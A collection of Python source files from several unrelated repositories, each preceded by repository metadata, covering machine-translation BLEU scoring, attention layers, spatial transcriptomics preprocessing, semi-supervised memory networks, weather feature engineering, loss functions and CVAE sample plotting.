postprocess: Whether do post-processing.
"""
self.lang_pair = lang_pair.lower()
self.reference_path = reference_path
self.num_refs = num_refs
if sacrebleu_args is None:
self.sacrebleu_args = []
else:
self.sacrebleu_args = sacrebleu_args.strip().split()
if num_refs == 1:
self.references = [self.reference_path,]
else:
self.references = ["{0}{1}".format(self.reference_path, ii) for ii in range(self.num_refs)]
self.src_lang, self.tgt_lang = self.lang_pair.split("-")[1]
self.postprocess = postprocess
self.test_set = test_set
def _postprocess_cmd(self, stdin):
cmd_detrucase = subprocess.Popen(["perl", DETRUECASE_PL], stdin=stdin, stdout=subprocess.PIPE, stderr=DEVNULL)
cmd_postprocess = subprocess.Popen(["perl", DETOKENIZE_PL, "-q", "-l", self.tgt_lang],
stdin=cmd_detrucase.stdout, stdout=subprocess.PIPE, stderr=DEVNULL)
return cmd_postprocess
def _compute_bleu(self, stdin):
sacrebleu_cmd = ["sacrebleu", "-l", self.lang_pair] + self.sacrebleu_args + ["--score-only", ]
if self.test_set is not None:
sacrebleu_cmd += ['--test-set', ] + [self.test_set]
else:
sacrebleu_cmd += self.references
cmd_bleu = subprocess.Popen(["sacrebleu", "-l", self.lang_pair] + self.sacrebleu_args + ["--score-only",] + self.references,
stdin=stdin,
stdout=subprocess.PIPE
)
bleu = cmd_bleu.communicate()[0].decode("utf-8").strip()
try:
bleu = float(bleu)
except:
print(type(bleu))
print(bleu)
exit(1)
return bleu
def corpus_bleu(self, hyp_in):
if self.postprocess:
cmd_postprocess = self._postprocess_cmd(stdin=hyp_in)
inp = cmd_postprocess.stdout
else:
inp = hyp_in
bleu = self._compute_bleu(stdin=inp)
return bleu
```
#### File: src/modules/attention.py
```python
import torch
import torch.nn as nn
# from torch.autograd import Variable
import src.utils.init as my_init
from .basic import BottleSoftmax
class ScaledDotProductAttention(nn.Module):
''' Scaled Dot-Product Attention '''
def __init__(self, d_model, attn_dropout=0.1):
super(ScaledDotProductAttention, self).__init__()
self.temper = d_model ** 0.5
self.dropout = nn.Dropout(attn_dropout)
self.softmax = BottleSoftmax(dim=1)
def forward(self, q, k, v, attn_mask=None):
"""
:type attn_mask: torch.FloatTensor
:param attn_mask: Mask of the attention.
3D tensor with shape [batch_size, time_step_key, time_step_value]
"""
attn = torch.bmm(q, k.transpose(1, 2)) / self.temper
if attn_mask is not None:
assert attn_mask.size() == attn.size(), \
'Attention mask shape {} mismatch ' \
'with Attention logit tensor shape ' \
'{}.'.format(attn_mask.size(), attn.size())
attn = attn.masked_fill(attn_mask, -1e18)
attn = self.softmax(attn)
attn = self.dropout(attn)
output = torch.bmm(attn, v)
return output, attn
class BahdanauAttention(nn.Module):
def __init__(self, query_size, key_size, hidden_size=None):
super().__init__()
self.query_size = query_size
self.key_size = key_size
if hidden_size is None:
hidden_size = key_size
self.hidden_size = hidden_size
self.linear_key = nn.Linear(in_features=self.key_size, out_features=self.hidden_size)
self.linear_query = nn.Linear(in_features=self.query_size, out_features=self.hidden_size)
self.linear_logit = nn.Linear(in_features=self.hidden_size, out_features=1)
self.softmax = BottleSoftmax(dim=1)
self.tanh = nn.Tanh()
self._reset_parameters()
def _reset_parameters(self):
for weight in self.parameters():
my_init.default_init(weight)
def compute_cache(self, memory):
return self.linear_key(memory)
def forward(self, query, memory, cache=None, mask=None):
"""
:param query: Key tensor.
with shape [batch_size, input_size]
:param memory: Memory tensor.
with shape [batch_size, mem_len, input_size]
:param mask: Memory mask which the PAD position is marked with true.
with shape [batch_size, mem_len]
"""
if query.dim() == 2:
query = query.unsqueeze(1)
one_step = True
else:
one_step = False
batch_size, q_len, q_size = query.size()
_, m_len, m_size = memory.size()
q = self.linear_query(query.view(-1, q_size)) # [batch_size, q_len, hidden_size]
if cache is not None:
k = cache
else:
k = self.linear_key(memory.view(-1, m_size)) # [batch_size, m_len, hidden_size]
# logit = q.unsqueeze(0) + k # [mem_len, batch_size, dim]
logits = q.view(batch_size, q_len, 1, -1) + k.view(batch_size, 1, m_len, -1)
logits = self.tanh(logits)
logits = self.linear_logit(logits.view(-1, self.hidden_size)).view(batch_size, q_len, m_len)
if mask is not None:
mask_ = mask.unsqueeze(1) # [batch_size, 1, m_len]
logits = logits.masked_fill(mask_, -1e18)
weights = self.softmax(logits) # [batch_size, q_len, m_len]
# [batch_size, q_len, m_len] @ [batch_size, m_len, m_size]
# ==> [batch_size, q_len, m_size]
attns = torch.bmm(weights, memory)
if one_step:
attns = attns.squeeze(1) # ==> [batch_size, q_len]
return attns, weights
``` |
{
"source": "15101538237ren/spatial-constrained-clustering-and-pseudotime",
"score": 2
} |
#### File: python_codes/util/util.py
```python
import os
import torch
import gudhi
import anndata
import numpy as np
import scanpy as sc
import squidpy as sq
import pandas as pd
import networkx as nx
from scipy.sparse import save_npz, load_npz
from scipy.spatial import distance
from sklearn.neighbors import kneighbors_graph
def mkdir(dir_path):
if not os.path.exists(dir_path):
os.makedirs(dir_path)
def load_ST_file(file_fold, count_file='filtered_feature_bc_matrix.h5', load_images=True, file_Adj=None):
adata_h5 = sc.read_visium(file_fold, load_images=load_images, count_file=count_file)
adata_h5.var_names_make_unique()
if load_images is False:
if file_Adj is None:
file_Adj = os.path.join(file_fold, "spatial/tissue_positions_list.csv")
positions = pd.read_csv(file_Adj, header=None)
positions.columns = [
'barcode',
'in_tissue',
'array_row',
'array_col',
'pxl_col_in_fullres',
'pxl_row_in_fullres',
]
positions.index = positions['barcode']
adata_h5.obs = adata_h5.obs.join(positions, how="left")
adata_h5.obsm['spatial'] = adata_h5.obs[['pxl_row_in_fullres', 'pxl_col_in_fullres']].to_numpy()
adata_h5.obs.drop(columns=['barcode', 'pxl_row_in_fullres', 'pxl_col_in_fullres'], inplace=True)
print('adata: (' + str(adata_h5.shape[0]) + ', ' + str(adata_h5.shape[1]) + ')')
sc.pp.filter_genes(adata_h5, min_cells=3)
return adata_h5
def load_DLPFC_data(args, sample_name, v2=True):
if v2 and sample_name != '151675':
file_fold = f'{args.dataset_dir}/DLPFC_v2/{sample_name}'
adata = sc.read_10x_mtx(file_fold)
adata.obsm['spatial'] = pd.read_csv(f"{file_fold}/spatial_coords.csv").values.astype(float)
sc.pp.filter_genes(adata, min_cells=3)
else:
file_fold = f'{args.dataset_dir}/DLPFC/{sample_name}'
adata = load_ST_file(file_fold=file_fold)
return adata
def load_slideseqv2_data():
adata = sq.datasets.slideseqv2()
sc.pp.filter_genes(adata, min_cells=3)
return adata
def load_seqfish_mouse_data():
adata = sq.datasets.seqfish()
sc.pp.filter_genes(adata, min_cells=3)
return adata
def load_visium_data(args, dataset):
adata = sc.datasets.visium_sge(dataset, include_hires_tiff=False)
sc.pp.filter_genes(adata, min_cells=3)
return adata
def load_stereo_seq_data(args):
file_fold = f'{args.dataset_dir}/stereo_seq'
adata = sc.read_csv(f"{file_fold}/RNA_counts.tsv", delimiter='\t', first_column_names=True)
coords = pd.read_csv(f"{file_fold}/position.tsv", delimiter='\t').values.astype(float)
adata = adata.transpose()[:, 1:]
adata.obsm["spatial"] = coords[:, :2]
sc.pp.filter_cells(adata, min_genes=100)
sc.pp.filter_genes(adata, min_cells=3)
return adata
def load_datasets(args, dataset):
if dataset == "slideseq_v2":
return load_slideseqv2_data()
elif dataset == "seqfish_mouse":
return load_seqfish_mouse_data()
else:
return load_stereo_seq_data(args)
def load_chicken_data(args, sample_name):
file_fold = f'{args.dataset_dir}/Visium/Chicken_Dev/ST/{sample_name}'
adata = load_ST_file(file_fold=file_fold)
return adata
def load_breast_cancer_data(args, sample_name):
base_dir = f"{args.dataset_dir}/Visium/Breast_Cancer"
count_fp = f'{base_dir}/ST-cnts/{sample_name}.tsv'
adata = sc.read_csv(count_fp, delimiter='\t', first_column_names=True)
coord_fp = f'{base_dir}/ST-spotfiles/{sample_name}_selection.tsv'
coord_df = pd.read_csv(coord_fp, delimiter='\t')
spots_idx_dicts = {f"{item[0]}x{item[1]}" : idx for idx, item in enumerate(coord_df[["x", "y"]].values.astype(int))}
spots_selected = np.array([sid for sid, spot in enumerate(list(adata.obs_names)) if spot in spots_idx_dicts]).astype(int)
coords = coord_df[["pixel_x", "pixel_y"]].values
adata.obsm["spatial"] = np.array([coords[spots_idx_dicts[spot]] for spot in adata.obs_names])
adata = adata[spots_selected, :]
coord_df = coord_df.iloc[spots_selected, :]
spots_idx_dicts = {f"{item[0]}x{item[1]}": idx for idx, item in enumerate(coord_df[["x", "y"]].values.astype(int))}
return adata, spots_idx_dicts
def load_preprocessed_data(args, dataset, sample_name, sedr=False):
data_root = f'{args.dataset_dir}/{dataset}/{sample_name}/preprocessed'
mkdir(data_root)
suffix = "-sedr" if sedr else ""
adata = anndata.read_h5ad(f'{data_root}/adata{suffix}.h5ad')
spatial_graph = load_npz(f'{data_root}/spatial_graph{suffix}.npz')
print(f"Readed Preprocessed Data of {dataset}!")
return adata, spatial_graph
def save_preprocessed_data(args, dataset, sample_name, adata, spatial_graph, sedr=False):
data_root = f'{args.dataset_dir}/{dataset}/{sample_name}/preprocessed'
mkdir(data_root)
suffix = "-sedr" if sedr else ""
adata.write(f'{data_root}/adata{suffix}.h5ad')
save_npz(f'{data_root}/spatial_graph{suffix}.npz', spatial_graph)
print(f"Saved Preprocessed Data of {dataset}!")
def preprocessing_data(args, adata, n_top_genes=None):
sc.pp.normalize_total(adata, target_sum=1e4)
sc.pp.log1p(adata)
sc.pp.highly_variable_genes(adata, n_top_genes=n_top_genes, flavor='cell_ranger', subset=True)
sc.pp.pca(adata)
coords = adata.obsm['spatial']
cut = estimate_cutoff_knn(coords, k=args.n_neighbors_for_knn_graph)
spatial_graph = graph_alpha(coords, cut=cut, n_layer=args.alpha_n_layer)
print('adata after filtered: (' + str(adata.shape[0]) + ', ' + str(adata.shape[1]) + ')')
return adata, spatial_graph
def preprocessing_data_sedr(args, adata, min_cells=3, pca_n_comps=300):
sc.pp.filter_genes(adata, min_cells=min_cells)
sc.pp.normalize_total(adata, target_sum=1, exclude_highly_expressed=True)
sc.pp.scale(adata)
sc.pp.pca(adata, n_comps=pca_n_comps)
coords = adata.obsm['spatial']
# cut = estimate_cutoff_knn(coords, k=args.n_neighbors_for_knn_graph)
# spatial_graph = graph_alpha(coords, cut=cut, n_layer=args.alpha_n_layer)
print('adata after filtered: (' + str(adata.shape[0]) + ', ' + str(adata.shape[1]) + ')')
return adata
def estimate_cutoff_knn(pts, k=10):
A_knn = kneighbors_graph(pts, n_neighbors=k, mode='distance')
est_cut = A_knn.sum() / float(A_knn.count_nonzero())
return est_cut
def graph_alpha(pts, n_layer=1, cut=np.inf):
# Get a graph from alpha shape
pts_list = pts.tolist()
n_node = len(pts_list)
alpha_complex = gudhi.AlphaComplex(points=pts_list)
simplex_tree = alpha_complex.create_simplex_tree(max_alpha_square=cut ** 2)
skeleton = simplex_tree.get_skeleton(1)
initial_graph = nx.Graph()
initial_graph.add_nodes_from([i for i in range(n_node)])
for s in skeleton:
if len(s[0]) == 2:
initial_graph.add_edge(s[0][0], s[0][1])
# Extend the graph for the specified layers
extended_graph = nx.Graph()
extended_graph.add_nodes_from(initial_graph)
extended_graph.add_edges_from(initial_graph.edges)
if n_layer == 2:
for i in range(n_node):
for j in initial_graph.neighbors(i):
for k in initial_graph.neighbors(j):
extended_graph.add_edge(i, k)
elif n_layer == 3:
for i in range(n_node):
for j in initial_graph.neighbors(i):
for k in initial_graph.neighbors(j):
for l in initial_graph.neighbors(k):
extended_graph.add_edge(i, l)
if n_layer >= 4:
print("Setting n_layer to greater than 3 may results in too large neighborhoods")
# Remove self edges
for i in range(n_node):
try:
extended_graph.remove_edge(i, i)
except:
pass
return nx.to_scipy_sparse_matrix(extended_graph, format='csr')
def get_target_fp(args, dataset, sample_name):
sp_suffix = "_SP" if args.spatial else ""
method_dir = f"{args.arch}{sp_suffix}"
return f"{dataset}/{sample_name}/{method_dir}"
def save_features(args, reduced_reprs, dataset, sample_name):
output_dir = f'{args.output_dir}/{get_target_fp(args, dataset, sample_name)}'
mkdir(output_dir)
feature_fp = os.path.join(output_dir, f"features.tsv")
np.savetxt(feature_fp, reduced_reprs[:, :], delimiter="\t")
print(f"features saved successful at {feature_fp}")
#### Color Util ####
def hex_to_RGB(hex):
''' "#FFFFFF" -> [255,255,255] '''
# Pass 16 to the integer function for change of base
return [int(hex[i:i+2], 16) for i in range(1,6,2)]
def RGB_to_hex(RGB):
''' [255,255,255] -> "#FFFFFF" '''
# Components need to be integers for hex to make sense
RGB = [int(x) for x in RGB]
return "#"+"".join(["0{0:x}".format(v) if v < 16 else
"{0:x}".format(v) for v in RGB])
def color_dict(gradient):
''' Takes in a list of RGB sub-lists and returns dictionary of
colors in RGB and hex form for use in a graphing function
defined later on '''
return {"hex":[RGB_to_hex(RGB) for RGB in gradient],
"r":[RGB[0] for RGB in gradient],
"g":[RGB[1] for RGB in gradient],
"b":[RGB[2] for RGB in gradient]}
def linear_gradient(finish_hex, start_hex="#FFFFFF", n=10):
''' returns a gradient list of (n) colors between
two hex colors. start_hex and finish_hex
should be the full six-digit color string,
inlcuding the number sign ("#FFFFFF") '''
# Starting and ending colors in RGB form
s = hex_to_RGB(start_hex)
f = hex_to_RGB(finish_hex)
# Initilize a list of the output colors with the starting color
RGB_list = [s]
# Calcuate a color at each evenly spaced value of t from 1 to n
for t in range(1, n):
# Interpolate RGB vector for color at the current value of t
curr_vector = [
int(s[j] + (float(t)/(n-1))*(f[j]-s[j]))
for j in range(3)
]
# Add it to our list of output colors
RGB_list.append(curr_vector)
return color_dict(RGB_list)
``` |
{
"source": "15110041/semi-memory",
"score": 2
} |
#### File: semi-memory/datasets/dataset_factory.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from datasets import svhn
from datasets import cifar10
from datasets import cifar100
FLAGS = tf.app.flags.FLAGS
datasets_map = \
{
'svhn': svhn,
'cifar10': cifar10,
'cifar100': cifar100,
}
def get_dataset(name, split_name, dataset_dir, file_pattern=None, reader=None):
if name not in datasets_map:
raise ValueError('Name of dataset unknown %s' % name)
return datasets_map[name].get_split(
split_name,
dataset_dir,
file_pattern,
reader)
```
#### File: 15110041/semi-memory/memory.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import network
FLAGS = tf.app.flags.FLAGS
EPISILON=1e-10
mask = lambda x, y: tf.boolean_mask(x, y)
diff = lambda x, n, eta: (x / tf.cast((1 + n), tf.float32))*eta
normalize = lambda x: x / tf.reduce_sum(x, axis=1, keep_dims=True)
def module(reuse_variables, labels, features, inferences):
num_c = FLAGS.num_classes
dim_f = FLAGS.feature_dim
with tf.variable_scope("memory", reuse=reuse_variables):
keys = tf.get_variable('keys',
shape=[num_c, dim_f],
dtype=tf.float32,
initializer=tf.constant_initializer(0.0),
trainable=False)
values = tf.get_variable('values',
shape=[num_c, num_c],
dtype=tf.float32,
initializer=tf.constant_initializer(1.0 / float(num_c)),
trainable=False)
diff_key = tf.gather(keys, labels) - features
diff_value = tf.gather(values, labels) - inferences
y, idx, count = tf.unique_with_counts(labels)
count_n = tf.expand_dims(tf.gather(count, idx), 1)
diff_key = diff(diff_key, count_n, FLAGS.eta)
diff_value = diff(diff_value, count_n, FLAGS.eta)
keys = tf.scatter_sub(keys, labels, diff_key)
values = normalize(tf.scatter_sub(values, labels, diff_value))
return keys, values
def label_ulabel(labels, logits, features):
where_label = tf.not_equal(labels, -1) # unlabel is given as -1
where_unlabel = tf.equal(labels, -1)
labels_l = mask(labels, where_label)
logits_l = mask(logits, where_label)
logits_u = mask(logits, where_unlabel)
features_l = mask(features, where_label)
features_u = mask(features, where_unlabel)
return labels_l, logits_l, logits_u, features_l, features_u
def content_based(keys, values, features_u):
dist = tf.sqrt((features_u[:, tf.newaxis] - keys) ** 2 + EPISILON)
memberships = tf.nn.softmax(-tf.reduce_sum(dist, axis=2))
memberships = tf.clip_by_value(memberships, EPISILON, 1)
pred_u = normalize(tf.reduce_sum(memberships[:, tf.newaxis] * values, 2))
return pred_u
def position_based(values, labels_l):
pred_l = tf.gather(values, labels_l)
return pred_l
def memory_prediction(keys, values, labels_l, features_u):
# key addressing & value reading
pred_l = position_based(values, labels_l)
pred_u = content_based(keys, values, features_u)
return tf.concat([pred_l, pred_u], 0, name='memory_pred')
def assimilation(keys, values, labels_l, features_u, logits):
mem_pred = memory_prediction(keys, values, labels_l, features_u)
net_pred = tf.nn.softmax(logits)
return mem_pred, net_pred
def accomodation(mem_pred, net_pred):
# model entropy
m_entropy = network.loss_entropy(mem_pred)
# memory-network divergence
mn_divergence = network.loss_kl(net_pred, mem_pred)
uncertainty = tf.reduce_max(mem_pred, axis=1)
mnd_weighted = tf.multiply(mn_divergence, uncertainty)
loss_m = tf.reduce_mean(tf.add(m_entropy, mnd_weighted))
return loss_m
```
#### File: 15110041/semi-memory/network.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
from nets import nets_factory
FLAGS = tf.app.flags.FLAGS
TOWER_NAME = 'tower'
EPISILON = 1e-8
def inference(images, num_classes, for_training=False, feature_name=None):
network_fn = nets_factory.get_network_fn(
FLAGS.model_name,
num_classes=num_classes,
weight_decay=FLAGS.weight_decay,
is_training=for_training)
logits, end_points = network_fn(images)
features = tf.squeeze(tf.squeeze(end_points[feature_name], squeeze_dims=1), squeeze_dims=1)
return logits, features
def loss_ce(logits, labels, weight=1.0):
labels = slim.one_hot_encoding(labels, FLAGS.num_classes)
return tf.cond(tf.size(labels) > 0,
lambda: tf.losses.softmax_cross_entropy(
logits=logits,
onehot_labels=labels,
label_smoothing=FLAGS.smoothing*float(FLAGS.num_classes),
weights=weight),
lambda: tf.constant(0.0))
def loss_entropy(p_prob, weight=1.0):
entropy = -tf.multiply(p_prob, tf.log(p_prob+EPISILON))
return tf.multiply(weight, tf.reduce_sum(entropy, axis=1), name='entropy')
def loss_kl(p_prob, q_prob, weight=1.0):
KL_divergence = tf.multiply(p_prob, tf.log(tf.divide(p_prob, q_prob) + EPISILON))
return tf.multiply(weight, tf.reduce_sum(KL_divergence, axis=1), name='kl')
def average_gradients(tower_grads):
average_grads = []
for grad_and_vars in zip(*tower_grads):
grads = []
for g, _ in grad_and_vars:
expanded_g = tf.expand_dims(g, 0)
grads.append(expanded_g)
grad = tf.concat(grads, 0)
grad = tf.reduce_mean(grad, 0)
grad = tf.clip_by_value(grad, -2., 2.)
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
``` |
{
"source": "15116087527/new-interface",
"score": 2
} |
#### File: new-interface/rw_data/excel_w.py
```python
import os
import time
from pyExcelerator import *
from Public.main import ks
# def excel():
# fname = "..\\Case\\test.xlsx"
# bk = xlrd.open_workbook(fname)
# try:
# sh = bk.sheet_by_name('Sheet1')
# except:
# print "%没有表名为Sheet1的" % fname
# # 获取行数
# # nrows = sh.nrows
# # # 获取列数
# # ncols = sh.ncols
# # print (nrows),(ncols)
# return sh.row_values(0)
class apc:
def exceslw(self):
aps = [u'用例ID', u'用例名', u'url', u'参数值', u'请求方式', u'期望', u'实际返回', u'结果']
# print aps
w = Workbook() #创建一个工作簿
ws = w.add_sheet('Hey, Hades') #创建一个工作表
# ws = copy('..\\Case\\test.xlsx')
pc = ks()
# print pc
for i in range(len(pc)):
for j in range(len(pc[i])):
# ws.write(i,j,aps[j]) #在1行1列写入bit
a = pc[i][j]
if j == 6:
ws.write(i, j, a.decode('utf-8')) # 在1行1列写入bit
else:
ws.write(i, j, a)
timestr = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
a = os.path.exists('..\\report\\%s'%timestr)
if a == False:
os.makedirs('..\\report\\%s'%timestr)
w.save('..\\report\\%s\\case_result.xlsx'%timestr) #保存
return pc
``` |
{
"source": "151232summerday/IJCAI17_Tianchi_Rank4",
"score": 2
} |
#### File: IJCAI17_Tianchi_Rank4/feature/WEATHER_FEATURES.py
```python
import numpy as np
import pandas as pd
import math
import sys
sys.path.append('../TOOLS')
from IJCAI2017_TOOL import *
def SSD(Temp,Velo,Humi):
score = (1.818*Temp+18.18) * (0.88+0.002*Humi) + 1.0*(Temp -32)/(45-Temp) - 3.2*Velo + 18.2
return score
WEATHER_raw = pd.read_csv('../additional/WEATHER_raw.csv',encoding = 'gbk',low_memory=False)
#%%
def AMPM2decimal(ser):
tt = ser.replace(' ',':').split(':')
tt[0] = np.int(tt[0])%12
if (tt[2] == 'AM'):
return np.float(tt[0]) + np.float(tt[1])/60.
if (tt[2] == 'PM'):
return np.float(tt[0]) + np.float(tt[1])/60. + 12.
def Eventclean(ser):
try:
if (math.isnan(ser)):
return 'None'
except:
tt = ser.replace('\n','\r').replace('\t','\r').split('\r')
tt2 = ''.join(tt)
return tt2
#%% clean the raw data
WEATHER_raw = WEATHER_raw[['DATE','Time','Temp','Visibility','Wind_speed','Humidity','Event','Condition','CITY_EN']]
WEATHER_raw['Time'] = [(lambda x:AMPM2decimal(x) ) (x) for x in WEATHER_raw['Time']]
WEATHER_raw['Event'] = [(lambda x:Eventclean(x) ) (x) for x in WEATHER_raw['Event']]
WEATHER_raw['Visibility'] = WEATHER_raw['Visibility'].replace('-',np.nan).fillna(method='ffill')
WEATHER_raw['Visibility'] = pd.to_numeric(WEATHER_raw['Visibility'], errors='ignore')
WEATHER_raw['Temp'] = WEATHER_raw['Temp'].replace('-',0.0)
WEATHER_raw['Temp'] = pd.to_numeric(WEATHER_raw['Temp'], errors='ignore')
WEATHER_raw.loc[ WEATHER_raw['Wind_speed'] == 'Calm','Wind_speed']= 0.0
WEATHER_raw['Wind_speed'] = WEATHER_raw['Wind_speed'].replace('-','3.6')
WEATHER_raw['Wind_speed'] = pd.to_numeric(WEATHER_raw['Wind_speed'], errors='ignore')
WEATHER_raw['Wind_speed'] = WEATHER_raw['Wind_speed']/3.6
WEATHER_raw['Humidity'] = WEATHER_raw['Humidity'].replace('N/A%','5%')
WEATHER_raw.loc[ WEATHER_raw['Humidity'] == '%','Humidity']= '5%'
WEATHER_raw['Humidity'] = [(lambda x: (np.int(x.split('%')[0]) ) ) (x) for x in WEATHER_raw['Humidity']]
WEATHER_raw['SSD'] = SSD(WEATHER_raw['Temp'] ,WEATHER_raw['Wind_speed'],WEATHER_raw['Humidity'])
WEATHER_raw.loc[ WEATHER_raw['Condition'] == 'Unknown','Condition']= np.nan
WEATHER_raw['Condition'] = WEATHER_raw['Condition'].fillna(method='ffill')
WEATHER_CON_LEVEL = pd.read_csv('WEATHER_CON_LEVEL.csv')
WEATHER_raw = pd.merge(WEATHER_raw, WEATHER_CON_LEVEL, on = 'Condition', how = 'left')
WEATHER_raw[['RAIN_IND','CLEAR_IND']] = WEATHER_raw[['RAIN_IND','CLEAR_IND']].fillna(0.0)
WEATHER_raw = WEATHER_raw[['DATE','Time','CITY_EN','SSD','RAIN_IND','CLEAR_IND']]
time1 = WEATHER_raw[((WEATHER_raw['Time']<=18.5) & ((WEATHER_raw['Time']>=11)) )]
#
time1_group = time1.groupby(['CITY_EN','DATE'],as_index = False).mean()
#
time1_group['SSD_C'] = np.abs(time1_group['SSD']-60) - np.abs(time1_group['SSD'].shift(1) -60)
time1_group = time1_group[((time1_group['DATE']<='2016-11-20') &(time1_group['DATE']>='2015-06-26')) ]
time1_group = time1_group.rename(columns = {'SSD':'RC','SSD_C':'RE','RAIN_IND':'RG','CLEAR_IND':'RI'})
#
time1_group = time1_group[['CITY_EN','DATE','RC','RE','RG','RI']]
time1_group.to_csv('WEATHER_FEATURES.csv',index = False)
``` |
{
"source": "151232summerday/Tencent_Ads_Algo_2018",
"score": 3
} |
#### File: src/data_tool/feature.py
```python
import numpy as np
import logging
import warnings
class FeatureInfo:
def __init__(self):
self.name = None
# include empty
self.ma = None
# note the second last is for empty, the last is for special value
# counter
self.ctr = None
# counter for positive label
self.mapper = None
@property
def empty_val(self):
# it is empty val
return self.ma
@property
def special_val(self):
return self.ma+1
@property
def n_val(self):
return len(self.ctr)
def construct(self,name,ma):
warnings.warn("This method assume empty val is not included in ma by default."
" It is not consistent with other function.")
self.name = name
self.ma = ma
# todo we could use dict as ctr
self.ctr = np.zeros(shape=(self.ma+2,),dtype=np.int32)
self.mapper = None
def __str__(self):
string = "{name}|{ma}|{ctr}".format(
name=self.name,
ma=self.ma,
ctr=" ".join([str(i) for i in self.ctr]),
)
return string
__repr__ = __str__
def to_str(self):
string = "{}\n".format(self.__str__())
return string
def from_str(self,string,special_val=True):
assert special_val==True
string = string.strip()
records = string.split("|")
assert len(records)==3
self.name = records[0]
self.ma = int(records[1])
self.ctr = np.fromstring(records[2].strip("]["), dtype=np.int32, sep=" ")
self.mapper = None
def construct_mapping(self):
self.mapper = np.arange(0,len(self.ctr),dtype=np.int)
logging.info("{} constructs its mapping, {} possible values.".format(self.name,self.n_val))
def construct_filter(self, l_freq):
'''
:param lq: lowest frequency
:return:
'''
self.filter = set()
for i in range(self.ctr.size):
if self.ctr[i]<l_freq:
self.filter.add(i)
# modify mapper and ctr
self.ctr[self.special_val] = 0
for i in self.filter:
self.mapper[i] = self.special_val
self.ctr[self.special_val] += self.ctr[i]
logging.info("{} constructs its filter, {}/{} values of lower freq than {} are filterd, then mapped to special value {}".format(self.name,len(self.filter),self.n_val,l_freq,self.special_val))
def map(self,idices):
return np.unique(self.mapper[idices])
def get_freqs(self,idices):
'''
Note !!! only mapped idices are supported.
:param idices: mapped idices
:return:
'''
warnings.warn("We should use mapped idices in get_freqs...")
freqs = self.ctr[idices]
return freqs
if __name__ == "__main__":
fn = "data/A_shiyu/mapped_user_feature_infos.txt"
from lib.debug.tools_v2 import load_feature_infos
feature_infos = load_feature_infos(fn)
feature_infos[5].construct_mapping()
print(feature_infos[5].name,feature_infos[5].mapper.shape)
print(feature_infos[5])
#print(feature_infos)
```
#### File: src/lib/logger.py
```python
import os
import logging
import shutil
def create_logger(output_path,comment,timestamp):
# archive_name = "{}_{}.tgz".format(cfg_name, time.strftime('%Y-%m-%d-%H-%M'))
# archive_path = os.path.join(os.path.join(final_output_path, archive_name))
# pack_experiment(".",archive_path)
log_file = '{}_{}.log'.format(timestamp,comment)
head = '%(levelname)s %(asctime)-15s %(message)s'
logging.basicConfig(filename=os.path.join(output_path, log_file), format=head)
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
return logger
```
#### File: src/loss/focal_loss.py
```python
import torch
import torch.nn as nn
def bce_focal_loss(input, target, gamma=2, weight=None, size_average=True, reduce=True):
if not (target.size() == input.size()):
raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
max_val = (-input).clamp(min=0)
loss = input - input * target + max_val + ((-max_val).exp() + (-input - max_val).exp()).log()
prob = torch.sigmoid(input)
prob_for_gt = target*prob+(1-target)*(1-prob)
if weight is not None:
loss = loss * weight
loss = loss * torch.pow((1-prob_for_gt),gamma)
#print(torch.pow((1-prob_for_gt),gamma))
if not reduce:
return loss
elif size_average:
return loss.mean()
else:
return loss.sum()
if __name__=="__main__":
from torch.autograd import Variable
input = Variable(torch.Tensor([-2.197,0.0,2.197]))
target = Variable(torch.Tensor([0,0,1]))
loss = bce_focal_loss(input,target)
print(loss)
```
#### File: src/loss/hinge_loss.py
```python
import torch
def hinge_loss(input,target,margin=1,weight=None,size_average=True):
'''
:param input:
:param target: assume to be {0,1}
:param margin:
:param weight:
:param size_average:
:return:
'''
target = 2*target-1
l = torch.max(margin-input*target,torch.zeros_like(target))
if weight is not None:
l = l * weight
if size_average:
l = torch.mean(l)
else:
l = torch.sum(l)
return l
if __name__=="__main__":
from torch.autograd import Variable
x = Variable(torch.FloatTensor([0.5,1.7,1.0]))
y = Variable(torch.FloatTensor([1,1,0]))
l = hinge_loss(x,y,size_average=False)
print(l)
``` |
{
"source": "1512474508/deep-generative-models",
"score": 2
} |
#### File: deep-generative-models/src/generate_samples_CVAE.py
```python
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
import argparse
import os
import imageio
import pandas as pd
from obj.CVAE import CVAE
##############################
# plot CVAE manifold
##############################
def squareToSpiral(d):
D = d-1
res = [0]
while D >= 0:
# downwards
if D != d-1:
res.extend([res[len(res)-1] + 1])
res.extend([res[len(res)-1]+(i+1) for i in range(D)])
# rightwards
res.extend([res[len(res)-1]+(i+1)*d for i in range(D)])
# upwards
res.extend([res[len(res)-1]-(i+1) for i in range(D)])
# leftwards
res.extend([res[len(res)-1]-(i+1)*d for i in range(D-1)])
# update counter, makes move for even and odd respectively
D -= 2
return res
def plotManifold_CVAE(namePickle,nameFile,im_dim,grid_size,latent_range,std,num_samples):
""" canvas code adapted from https://jmetzen.github.io/2015-11-27/vae.html """
print("plotting manifold samples")
dim = pd.read_csv("./pickles/"+namePickle+"/log.csv")["latent_dimensions"][0]
model = CVAE(dim)
model.load_weights("./pickles/"+namePickle+"/cvae")
nx = ny = grid_size
x_values = np.linspace(-latent_range, latent_range, nx)
y_values = np.linspace(-latent_range, latent_range, ny)
canvas = np.empty((im_dim*ny, im_dim*nx))
s = [std for i in range(dim)]
load=[]
for i, yi in enumerate(x_values):
for j, xi in enumerate(y_values):
mean = [xi for i in range(int(dim/2))]+[yi for i in range(int(np.ceil(dim/2)))]
x_mean = tf.reduce_mean(model.sample(tf.random.normal((num_samples,model.latent_dim),mean=mean,stddev=s)),axis=0)[:,:,0]
load.append(x_mean)
canvas[(nx-i-1)*im_dim:(nx-i)*im_dim, j*im_dim:(j+1)*im_dim] = x_mean
plt.figure(figsize=(8, 10))
Xi, Yi = np.meshgrid(x_values, y_values)
plt.imshow(canvas, origin="upper", cmap="gray")
plt.tight_layout()
plt.savefig(os.path.abspath(os.path.dirname(os.getcwd()))+"/img/"+nameFile+".png", dpi=400)
